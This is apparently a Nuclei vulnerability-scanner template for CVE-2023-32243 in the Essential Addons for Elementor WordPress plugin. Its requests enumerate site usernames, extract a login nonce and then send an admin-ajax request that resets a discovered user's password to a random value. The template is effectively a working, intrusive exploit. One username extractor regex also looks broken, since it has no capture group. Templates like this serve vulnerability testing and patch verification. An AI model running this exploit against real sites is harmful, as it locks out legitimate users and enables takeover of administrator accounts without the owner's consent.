id: CVE-2023-32243 info: name: WordPress Elementor Lite 5.7.1 - Arbitrary Password Reset author: DhiyaneshDK,Vikas Kundu severity: critical description: | Improper Authentication vulnerability in WPDeveloper Essential Addons for Elementor allows Privilege Escalation. This issue affects Essential Addons for Elementor: from 5.4.0 through 5.7.1. reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-32243 - https://patchstack.com/articles/critical-privilege-escalation-in-essential-addons-for-elementor-plugin-affecting-1-million-sites?_s_id=cve - https://github.com/RandomRobbieBF/CVE-2023-32243/blob/main/exploit.py - https://wordpress.org/plugins/essential-addons-for-elementor-lite/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-32243 cwe-id: CWE-287 metadata: google-query: inurl:/wp-content/plugins/essential-addons-for-elementor-lite max-request: 6 verified: true tags: cve,cve2023,wordpress,wp,wp-plugin,auth-bypass,intrusive http: - raw: - | GET /wp-login.php HTTP/1.1 Host: {{Hostname}} - | GET /wp-json/wp/v2/users/ HTTP/1.1 Host: {{Hostname}} - | GET /?rest_route=/wp/v2/users HTTP/1.1 Host: {{Hostname}} - | GET /feed/ HTTP/1.1 Host: {{Hostname}} - | GET /author-sitemap.xml HTTP/1.1 Host: {{Hostname}} - | POST /wp-admin/admin-ajax.php HTTP/2 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded action=login_or_register_user&eael-resetpassword-submit=true&page_id=124&widget_id=224&eael-resetpassword-nonce={{nonce}}&eael-pass1={{password}}&eael-pass2={{password}}&rp_login={{wordpress-username}} payloads: password: - "{{randstr}}" host-redirects: true max-redirects: 2 stop-at-first-match: true matchers: - type: word part: body_6 words: - '"success":true' - '"data":' condition: and extractors: - type: regex name: nonce part: body_1 group: 1 regex: - 'nonce":"([0-9a-z]+)' internal: true - type: json part: body name: wordpress-username group: 1 json: - '.[] | .slug' - '.[].name' internal: true - type: regex part: body_4 name: wordpress-username group: 1 regex: - '<\/dc:creator>' internal: true - type: regex part: body_5 name: wordpress-username group: 1 regex: - '\/author\/([a-z-]+)\/' internal: true